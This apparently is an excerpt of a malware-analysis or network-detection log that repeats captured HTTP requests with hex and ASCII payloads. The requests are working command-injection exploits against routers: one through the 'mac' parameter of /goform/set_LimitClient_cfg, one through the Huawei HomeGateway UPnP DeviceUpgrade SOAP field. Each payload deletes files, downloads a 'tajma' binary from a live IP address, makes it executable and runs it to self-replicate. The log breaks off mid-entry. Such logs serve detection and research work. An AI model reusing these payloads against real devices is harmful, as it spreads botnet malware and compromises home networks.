                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 